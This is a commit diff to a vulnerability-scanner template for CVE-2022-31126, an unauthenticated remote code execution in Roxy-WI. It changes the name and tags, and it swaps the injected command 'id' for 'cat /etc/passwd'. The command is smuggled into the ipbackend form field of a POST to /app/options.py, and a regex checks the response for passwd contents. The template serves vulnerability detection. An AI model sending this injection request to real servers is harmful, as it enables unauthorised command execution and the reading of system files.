Update CVE-2022-31126.yaml

patch-1
Prince Chaddha 2022-08-12 17:12:49 -07:00 committed by GitHub
parent 43394908bc
commit 9d15b9fbce
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 12 deletions

View File

@ -1,7 +1,7 @@
id: CVE-2022-31126
info:
name: Roxy-WI Unauthenticated Remote Code Executions
name: Roxy-WI - Unauthenticated Remote Code Execution
author: DhiyaneshDK
severity: critical
description: |
@ -14,32 +14,26 @@ info:
metadata:
verified: true
shodan-query: http.html:"Roxy-WI"
tags: rce,unauth,roxy
tags: cve,cve2022,rce,unauth,roxy
requests:
- raw:
- |
POST /app/options.py HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Origin: {{BaseURL}}
Referer: {{BaseURL}}/app/login.py
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
alert_consumer=1&serv=127.0.0.1&ipbackend=";id+##&backend_server=127.0.0.1
alert_consumer=1&serv=127.0.0.1&ipbackend=";cat+/etc/passwd+##&backend_server=127.0.0.1
matchers-condition: and
matchers:
- type: word
- type: regex
part: body
words:
- "uid="
- "gid="
- "groups="
condition: and
regex:
- "root:.*:0:0:"
- type: status
status: